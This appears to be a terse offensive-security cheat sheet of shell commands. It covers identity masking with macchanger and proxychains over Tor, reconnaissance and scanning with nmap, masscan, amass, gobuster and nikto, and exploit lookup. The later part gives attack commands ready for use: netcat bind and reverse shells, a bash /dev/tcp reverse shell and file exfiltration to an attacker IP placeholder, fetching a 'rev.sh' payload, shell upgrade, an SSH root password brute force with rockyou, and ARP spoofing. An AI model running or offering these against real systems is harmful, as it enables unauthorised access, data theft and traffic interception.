Change MAC Address
ip link set dev eth0 down
macchanger -m 12:23:34:45:56:67 eth0
ip link set dev eth0 up
Static ip configuration
ip addr add 10.5.23.56/24 dev eth0
Proxychains with Tor
systemctl start tor
stop: Used to stop tor servicesrestart: Used to restart tor services
proxychains curl http://ifconfig.me/ip
Use proxychains before running any cmd
whois to query WHOIS servers
whois <target>
nslookup to query DNS servers
nslookup <target>
nslookup -type=A <target> 1.1.1.1
dig to query DNS servers
dig <target>
dig @1.1.1.1 <target> TXT
Online:
Web Browser:
- Chrome DevTools
- FoxyProxy (change the proxy server)
- User-Agent Switcher and Manager (pretend to different OS/browser)
- Wappalyzer (technologies used)
Test connection and DNS information
ping <target>
traceroute/tracert <target>
Communicate with host
telnet <target> <port>
GET / HTTP/1.1
host: telnet
nc <target> <port>
GET / HTTP/1.1
host: netcat
Finds subdomains of a web server
nmap -sn -Pn --script=hostmap-crtsh <target>
combine various sources for subdomain enum
amass enum -src -brute -min-for-recursive 2 -d <target>
nmap -A -T4 <target>
-sV: Probe open ports to determine service/version info-O: Enable OS detection-p <port ranges>: Only scan specified ports-sC: equivalent to --script=default-A: Enable OS detection, version detection, script scanning, and traceroute--script=vuln: detect vulnerability script on target
masscan -p80,8000-8100 --rate 20000 10.0.0.0/8
gobuster dir -u <url> -w /usr/share/wordlists/dirb/common.txt -t 30
dir– (scan for directories).-u: Target URL.-w: the wordlist we are using to scan
???
nikto -host <target>
searchsploit <keyword>
-m: mirror download the exploit-u: show url to its CVE
requests lib error for python2
git clone https://github.com/kennethreitz/requests
cd requests && python setup.py
pip3 install --force-reinstall requests
pip3 install --ignore-installed requests
msfconsole
python3 -m http.server
wget <your_ip>:8000/rev.sh
connect
# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444
-l: Listen-v: Verbose-n: Do not use DNS-p: What port to listen on
bind shell
# client before
nc -lvnp 4444 -e "/bin/bash -i"
# attacker after
nc <rhost> 4444
reverse shell
# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444 -e "/bin/bash -i"
# reverse shell
bash -i >& /dev/tcp/<your_ip>/4444 0>&1
# file upload
bash -c 'cat $LFILE > /dev/tcp/<your_ip>/4444'
# file download
bash -c 'cat < /dev/tcp/<your_ip>/4444 > file.txt'
python3 -c 'import pty; pty.spawn("/bin/bash")'
Bruteforce SSH password
ncrack -p22 --user root -P /usr/share/wordlists/rockyou.txt <target>
ARP spoofing
arpspoof -t 10.10.10.24 10.10.10.25
ARP cache
# show cache
ip neigh
# delete cache
ip neigh flush all


